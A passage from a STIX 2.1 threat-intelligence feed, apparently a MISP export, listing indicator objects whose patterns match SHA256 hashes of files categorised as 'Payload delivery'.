"pattern": "[file:hashes.SHA256 = '927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695c-4a90-42da-89cf-4e74950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0f7810dddc7f204c7da31f6d599ddf7b671dc635aa1c415dd3f5a65ffa0d72e9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695d-0600-4509-abbd-43f9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695e-8f70-4408-8c99-4b0e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db695f-dcac-4c2e-88a6-4e1a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6960-4d8c-4651-9af9-4428950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '485c8b3339b13cd8cbb52c03b1024665f9307490a107c0bd8205cebf76cdcd3b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6961-64e4-4de0-a6f4-436d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'fffef40864cecb56422bb793055749084ab1d756a35075d60cd547b2a7b074cd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6962-6800-4605-9db9-420e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6963-40c8-439f-80f3-4d9b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd13c9c157d9ef56620698b20e2ffca8d9dcac3dd3109382098f423ca9588031f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6964-574c-43c9-a14d-4dd7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6965-bc98-415f-ab7d-487f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '4a9c473209596f2abb19c0a15b638458ef2c27a208053ec6f89b7b5e8efc882f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6966-c3f8-4381-824a-4714950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b36087991947633cfb1d758065323daf9e2179f668a31e6f639d85f946bef3cd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6967-c874-489f-8e71-4f4b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '93ce0b122022fbd855b22e88b6598f705a319154cc3b6693f0a55fee8382fdbf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6968-af58-407f-a93f-4a67950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dc0bbbd2d6b7d37886059415d6cdcb4ac93b55ae06162670407b6aa0eaf44b63']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6969-d994-4694-b173-467f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ebfb311bf63b625ddf60d925669cf6b52a8980636a7b1536341cc78ac494eeb4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696a-c434-4a94-a105-48bf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c7b07e16f61c792b8ccf5de098b0b291957b83184786b578bf87dcf3aba06d1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696b-0120-4099-9388-415e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696c-ce08-46d8-8a90-4df5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '42c5651efc6ff62f6315f315f25c0407e773e702f43cca806ffb4c8ff899f524']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696d-a4d4-49b4-81a5-4055950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696e-451c-44a5-864e-4805950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db696f-dfdc-4cdc-84e5-44b4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '45c3824018e889e8fb006a83386a1e459b563cf9db1546f49c4bbc5faa9ea74e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6970-ceec-400b-9bff-4172950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e911e6e631d26b2f93779868d4b20224b2bfde798f2d42cb9870d951f4f10c53']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6971-fdec-46e1-9df4-4c37950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f66536dff13b1ba415bd4c5fc172632465d33cc388899e976a49380da5620e45']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6972-743c-49d1-90fd-4ec6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f1af98d63fec8e0164aa6bac58c680c80075545aabdbdc49ef9cb45694d14642']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6973-fdc0-43b7-85c1-4268950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e701fa1b68a80e77863e06de17a19a2f489aefe8af8b47bc0d908c726eb41053']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6974-3958-4435-8a25-473b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '03307e8bbbdceaa8393cdd13fd854d2705b5bfdf211b40a53113b915debbfc02']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6975-3d20-4f27-bb3c-4760950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b5a785aa5284b96f08e9b191b3c1259d13e478523504486a24191b6e239b74e2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6976-e1c8-485d-b672-4f3e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7c324b8b01db025d627df826283af003f54d2d5f20d6d52bee380a69a1fcd9d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6977-6ae4-4d96-8357-4b96950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '08cc9d83ae7f9805058555a43ec0f0daa73346feb38c2c244b3a4311f623d3b7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6978-2d90-4429-8cf7-494d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e73b2fdd33a250705dd044761a1890afe5ba0b1553b2c7ae5dbedd45e58c0a0a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6979-fce4-4edb-b084-43e5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e3d368a3e613f27cfd17db2ed439b6980f9bf0d10458d25066e316e4193c5d18']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6979-9f18-4527-8e45-4e1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'bfdad4010fb8104881c0392ff3d60e43e9eee73a7f8d00ab2097898dcfc14710']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697a-3928-4ca0-8fdf-481f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '35f636b1876b17b923486924ebe629a98465b480f6635c9db09a16814a5eada3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
